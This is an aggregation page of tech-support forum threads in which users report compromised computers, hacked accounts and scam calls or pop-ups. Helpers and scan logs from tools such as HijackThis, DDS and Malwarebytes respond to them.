My computer has been acting fine and I have not seen any strange pop-ups or anything like that yet.
 
Thanks for your help in advance

Answer: ISP sent me a "Compromised Computer Notification" email

"Dear Subscriber" is the first indication it's fake.....they would use your name when contacting you,
 
delete the email and ignore it, or call them directly.....don't follow any instructions on the email, or click on anything in the email

22 more replies

Hi everyone, this computer is running Windows 8 and outlook 2013, plus Smart Security by ESET 7.

The other day my hosting company shut down my email accounts. I'm not sure which system did it, but my dad and sister were using our webmail and the email accounts started sending thousands of emails. These are the only details that I have. This computer is approx 2 months old and runs great. Please help by reviewing the files and see if there are any trojans, malware, etc. that could have done this. We are afraid to use the systems as passwords are now compromised.

GMER had problems loading. Could not run some scans because System32 was running and ntuser.dat. FYI

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 2:05:29 PM, on 4/21/2014
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v10.0 (10.00.9200.16537)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Windows\SysWOW64\RunDll32.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_12_0_0_77.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_12_0_0_77.exe
C:\Program Files (x86)\TeamViewer\Version... Read more

Answer: emails & passwords have been compromised - Computer 1

10 more replies

It's been a month of reading and searching around forums, but I just can't get it done. It's totally another level for a newbie like me.
My Samsung laptop and Alienware desktop both got corrupted. The factory image has been modified; I download anti-virus programs, but they get modded and become useless. I do not have admin rights on my own computer. The Windows firewall policy got modded, but I have no idea how to get it fixed. Windows Defender can't be run because its service is missing. I have a TEMP/TMP folder in my profile which can't be removed. All the files and folders are being shared, even though I did turn off the sharing setting. They can't be deleted due to admin access. Shortcuts and thumbnails have invalid paths. Group policy is being modded, and I'm totally clueless how to get it fixed. Workstation is running, although I'm on a home network. Background processes like CTF loader and COM keep running even though I keep ending the process. Windows Installer keeps running, but I have no idea what it is for. Windows Update keeps searching but can't install. Sometimes it freezes. The registry has been modded; I have no knowledge about it, so I don't dare delete some of it. Cmd can't be run. Lots of svchost running in the services. I did so many corrections, but once I restart everything is back to square one. Guys, please help, because the one who did this is staying right above me. So I'm clueless how to get it fixed.

Answer: Computer devices got compromised using the same router.

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there. CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/581281 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies

Hello all,
About two weeks ago my computer got attacked by a nasty virus, and ever since it's been running a lot slower. A few days ago I got a message from Time Warner Cable that they were temporarily blocking my internet service because my computer had been turned into a zombie and was sending out spam messages. They weren't completely sure, but they think it was the Koobface virus and the only way to get rid of it is to reformat and reinstall. Thankfully I have nearly everything I need backed up, some on CDs and most through Carbonite. I was also planning to upgrade to Windows 7 so this is as good a time as any. The big issue I'm facing though is what can I safely put back on my system after I reinstall. From what I understand, when a computer is turned into a zombie the worm digs into your system and constantly changes its name so it's nearly impossible to track down and get rid of. Is this only through things like the registry and system files/settings, or can it embed itself into other unrelated files like pictures and videos? If it's the first situation I should be alright if I just restore everything in my Carbonite and hard copy backups back onto my clean system. But if it can get into my other files then are they all too tainted to trust? On a side note, could a worm infect files in a separate volume on my hard drive? Most of my movies are on their own partition so it would be simple to save them.

More replies

Hi Guys,
 
I been a frequent lurker on this site and you guys have been a great help. 
 
What are some options for someone who has had their phone's sim card cloned. Also the PC is compromised..
 
Have any of you ever dealt with a situation like this? What can I do to ensure that this phone is clean? It's an iPhone 6 - the cell company says it's been addressed. 
 
Will scanners like malwarebytes actually pick up installed "spy" programs? I believe someone locally did this.
 
I haven't looked at the computer yet, but just trying to get a game plan and not make any mistakes.

Answer: Computer compromised by a local person, help

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there. CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/578101 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies

Here is the log from the Panda scan. Computer is compromised. Several problems.

I have Windows XP, Home Edition. Just checked for WINDOWS updates. Evidently all are there except for SP2.

LOG:


Incident Status Location

Virus:Trj/Cimuz.JX Disinfected Operating system
Adware:adware/virtualbouncer Not disinfected c:\windows\system32\INNERADINSTALL.LOG
Adware:adware/savenow Not disinfected c:\windows\downloaded program files\WUInst.inf ... Read more

Answer: Computer compromised. Many problems. Log attached.

Well it doesn't look bad after having run that program.

I just think you should run a couple of others.

Those are the two free programs from AVG, Antivirus and Antispyware. Be sure to also have removed the Panda program, and you can also remove both AVG programs after you have completed 2 cleanings each. As in clean, restart, clean once more.

http://free.grisoft.com/

2 more replies

Alright, my Dad's office has about 10 computers and they have all been locked down via securities to not have internet access; however one computer is open that receives the company email.

The other day some x-popups were on the screen when only one person was supposed to be in the office. This person denied it, so an investigation was under way. A log was pulled of the last couple of months showing sites visited and the times they were visited. Some of the times were like 3 or 4 am. So logs were checked at the bldg security company to see when people were logged into the bldg, and no one was at the times involved. The computer has been slow for a very long time, so my dad had already ordered another one before this happened and just replaced the computer in question.

So now we have a brand new computer added to the same network where it is the only computer online and it still shows visits to x-sites at 3 and 4 in the morning.

Can anyone explain what might be going on?

Thanks,
Will

Answer: Can my network be compromised if I just bought a new computer?

I am suspecting a night crew somehow... cleaning, night shift. Are they on a router? What is the antivirus? Let's run 2 scans on the PC that connected. Please download TDSSKiller.zip and extract it. Run TDSSKiller.exe. Click Start scan. When it is finished the utility outputs a list of detected objects with description.
The utility automatically selects an action (Cure or Delete) for malicious objects.
The utility prompts the user to select an action to apply to suspicious objects (Skip, by default). Leave the options as they are and click Continue. Let it reboot if needed and tell me if the tool needed a reboot. Click on Report and post the contents of the text file that will open.

Note: By default, the utility outputs the log into the system disk (it is usually the disk with the installed operating system, C:\) root folder. The log has a name like: TDSSKiller.Version_Date_Time_log.txt.

I'd like us to scan your machine with ESET OnlineScan. Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan. Click the button. For alternate browsers only: (Microsoft Internet Explorer users can skip these steps) Click on to download the ESET Smart Installer. Save it to your desktop. Double click on the icon on your desktop. Check Click the button. Accept any security warnings from your browser. Under scan settings, check and check Remove found threats. Click Advanced settings and select the following: Scan potentially unwanted applications. Scan for potential... Read more

1 more replies

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:03:14 PM, on 1/12/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Creative Labs Shared\Service\CreativeLicensing.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\System32\GEARSec.exe
C:\Program Files\Linksys\Linksys Updater\bin\LinksysUpdater.exe
C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\java.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\ehome\e... Read more

More replies

Windows 7, Outlook 2013 and ESET Smart Security 7. This is the second computer with the issue below that we would like reviewed please.

The other day my hosting company shut down my email accounts. I'm not sure which system did it, but my dad and sister were using our webmail and the email accounts started sending thousands of emails. These are the only details that I have. This computer is approx 2-3 years old and runs great, but it's my sister's so I'm not sure if she's on Facebook or which sites may have done this. Please help by reviewing the files and see if there are any trojans, malware, etc. that could have done this. We are afraid to use the systems as passwords are now compromised.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 6:09:58 PM, on 4/21/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.16521)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
C:\Program Files (x86)\TechSmith\Snagit 10\Snagit32.exe
C:\Users\Mary\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Common Files\Nikon\Monitor\NkMonitor.exe
C:\Program Files (x86)\ACT\Act for Windows\Act.Outlook.Service.exe
C:\Program Files (x86)\Brother\ControlCenter3\brccMCtl.exe
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\TechSmith\Snagit 10\TSCHelp.exe
C:\Program Files (... Read more

Answer: emails & passwords have been compromised - Computer 2

Hi, I just wanted to reach out see if anyone could review this.
 

2 more replies

I had a World of Warcraft account that is accessed from my computer recently attacked by hackers. Since I also access a number of much more valuable accounts (banking, etc.) it rang a lot of alarm bells. I had been running Norton Antivirus, but apparently it didn't find anything. I'm totally sure I didn't fall prey to any sort of social engineering or phishing, so I'm trying to review my system to see what was installed. It does look like spyware made it onto the system at some point (note the Media Star 2 toolbar, which I didn't install myself, and took over IE), and I'm assuming a Keylogger or password sniffer made it onto the machine.

Since Norton didn't detect anything, I tried Kaspersky, and it did find some files that it identified as trojans. Those were removed, although it still isn't clear to me how the passwords were observed.

I've run HijackThis, and I'm hoping an expert can take a look and let me know if you notice anything I should still be concerned about.

==================================

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:10:54 PM, on 3/2/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16722)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
C:\Program Files\Hewlett-Packard&#... Read more

Answer: HiJackThis - Recently Compromised Computer

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay. We need to see some information about what is happening in your machine. Please perform the following scan: Download DDS by sUBs from one of the following links. Save it to your desktop. DDS.scr DDS.pif. Double click on the DDS icon, allow it to run. A small box will open, with an explanation about the tool. No input is needed, the scan is running. Notepad will open with the results. Follow the instructions that... Read more

2 more replies

Good Morning:

AVG alerted me last week that there were several trojan Horses in our computer, trojan Horse 16.BVN, I believe. It seemed to remove them, but they were found again by AVG over the next couple of days every time AVG ran its scan at startup, together with other viruses.
Then, it didn't find that particular trojan, but a different one: trojan SHeur2.CBKQ.

The IT person at my husband's job told him to get rid of AVG, and use Avast instead, saying it is a better program. So, we deleted AVG, installed Avast, which promptly found that same trojan. That was yesterday. Today, Avast didn't find any trojans, but I updated Malwarebytes, and it found a trojan in the registry keys. Here is the log:

Malwarebytes' Anti-Malware 1.42
Database version: 3444
Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/28/2009 11:47:48 AM
mbam-log-2009-12-28 (11-47-48).txt

Scan type: Quick Scan
Objects scanned: 109629
Time elapsed: 3 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\richtx64.exe (Trojan.Agent) -> Qu... Read more

More replies

My Hotmail account was hacked, and under 'recent activity' I saw successful logins using MY IP address and Exchange ActiveSync. (Would love to know what this means, how it's accomplished). After changing the password, I continued to see successful logins, until I created the 2-step verification process and a stronger password. Even now, on a daily basis I see Numerous attempts to log into my email: "incorrect password entered."
One of the logins listed a different IP address, which I was able to track down, and I now have all the details regarding its user. Any advice on what to do with that info--who to report it to?
I use free versions of AVAST, Malwarebytes and now SUPERAntiSpyware. I am really concerned about the security of my system.
What can I do to ensure the safety of online banking or online purchases?
Is there a way to know if it's just my Hotmail that was hacked or if there's someone/thing lurking in my PC?
Your advice will be greatly appreciated!!
 

Answer: Compromised computer or just a hacked hotmail account?!

If you want us to check your system for malware, please do the following:

READ & RUN ME FIRST. Malware Removal Guide

You may also want to read this:

How to Protect yourself from malware!


This computer had had RDP access open to the Internet for some time, and a bot recently cracked the Administrator password and successfully logged in. RDP access was disabled about 12 hours after the first successful login, but I'm almost certain there are now new or pre-existing viruses on the computer, and a quick scan with Spybot Search & Destroy showed a suspected "system service that has been identified as a threat" with the displayed name "!!!!" and the registry key "hide_evr2".

Thank you in advance for your time and assistance!
.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 7.0.5730.11
Run by Chaplain Dave at 18:18:42 on 2012-05-29
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2046.1233 [GMT -7:00]
.
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\WINDOWS\system32\afasrv32.exe
C:\WINDOWS\system32\astsrv.exe
C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Pervasive Software\PSQL\bin\w3dbsmgr.exe
C:\WINDOWS... Read more

Answer:Suspected Rootkit Installed, Computer Compromised through RDP

Sorry, I do not mean to bump this topic, but I don't seem to be able to edit my original post.

I have since run Spybot Search & Destroy and a full scan with Malwarebytes Anti-Malware and removed all threats detected by both scans. I then ran another Spybot scan in safe mode, which found no threats.

I will not have access to the Internet from June 3 through June 9, but despite my inevitable lack of response, I am still seeking assistance on this issue.

Thank you in advance!


I receive telephone calls; they tell me my computer is sending data and they just happen to be able to stop it!!
They want me to send them money, and they will go into my computer and fix it for their fee $$$!

1) How can I stop these pesky phone calls..?? They seem to know when I am on the computer!

2) How did they get my phone number!?

3) Is there a "Cookie" or some "Setting" I can change or remove to stop this Kidnapping/Ransom!!!

Answer:Phone Call telling me they KNOW my computer is compromised.

1) You can't, they are usually overseas and the calls are difficult to block. They have no idea if you have a PC.
Tell them next time you only have an iPad or Apple Mac, and they hang up.
I get a call probably every 6-12 weeks, and sometimes play along with them for 40 mins or more before they hang up, usually asking them all sorts of silly questions while acting concerned and trying to do everything I can, or asking them to hold on while I turn on the PC, and then just leaving the phone.

2) Companies sell lists of phone numbers, also from the normal phone book, and given the type of people you are dealing with, probably by various illegal activities.

3) No setting. Just a) never let them on to the PC, and if you have, you need to post in the virus forum to get the remote access and any malware off the machine.


I got a weird warning while playing a FB game tonight. It opened a new tab in Firefox and started playing an audio message telling me to call this number. One message states: WARNING: Customer - Your browser and computer may be compromised by security threats. Call 1-877-679-2144 now for IMMEDIATE assistance. There's a web page behind that pop-up message. It's (malware alert dot org slash warning dot html). How do we get this to stop? Is it a virus? I scanned with AVG and it didn't pick anything up.

Answer:Browser and Computer Compromised - Call 877-679-2144?

Sounds like there is something fishy going on in your system. Try checking your Firefox Add-ons and Extensions and remove anything. You might also want to have a quick look at your Programs and Features to see if there is a Potentially Unwanted Program (PUP) installed on your computer.


Lately I have been receiving calls telling me my computer has been compromised and is operating at less than 100%. Of course the caller, who is not a native English speaker, offers to guide me through what I need to do to fix it. They state they are calling from Microsoft. What kind of scam is this?


Please help!!! Seems compromised, ComboFix says it detected a rootkit, cannot seem to fix it up???

Answer:computer seems compromised, freezing, combofix says rootkit

Hi, Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log. Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there. The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic, and if you do not reply by the following day after that then I will close the topic. Once I receive a reply then I will return with your first instructions. Thanks


Hi,

I ran across this forum when I was searching for info on a pop-up that gives the following text:

Message from Local System to User on 3/30/2008 12:53 AM. CRITICAL ERROR MESSAGE!-REGISTRY DAMAGED AND CORRUPTED

To FIX this problem:
Open Internet Explorer and type: www.registrycleanerxp.com
Once you load the web page, close this message window

After you install the cleaner program you will not receive an more reminders or pop-ups like this.

VISIT www.registrycleanerxp.com IMMEDIATELY!

I have researched this and I know it is a scam and probably some sort of malware, virus, etc., but I have done a lot, and nothing seems to stop it. The computer I have was given to me in 2004 and I finally got it running and realized it was infected. It crashes after multiple messages like this come up, and eventually many strange redirections to websites occur. I ran antivirus and anti-rootkit programs. I managed to destroy or quarantine many viruses, but there is still a problem because I am getting this pop-up. I am exhausted and feel like destroying the computer. I was thinking of doing a trial of Trend Micro's product(s), because I don't want to get stuck with something I don't like at a high price. It hasn't done it yet, but my computer will probably eventually lock up and prevent me from using it at all.

Any ideas would be appreciated.

One last thing. When I ran the anti-virus program, it quarantined many viruses or suspect files. I restarted my computer and g... Read more

Answer:Frustrated with compromised computer (Moved from Win2k)

I wish someone would recognize this and give some advice. I am thinking of trying some free software called RegCare to try to resolve this.
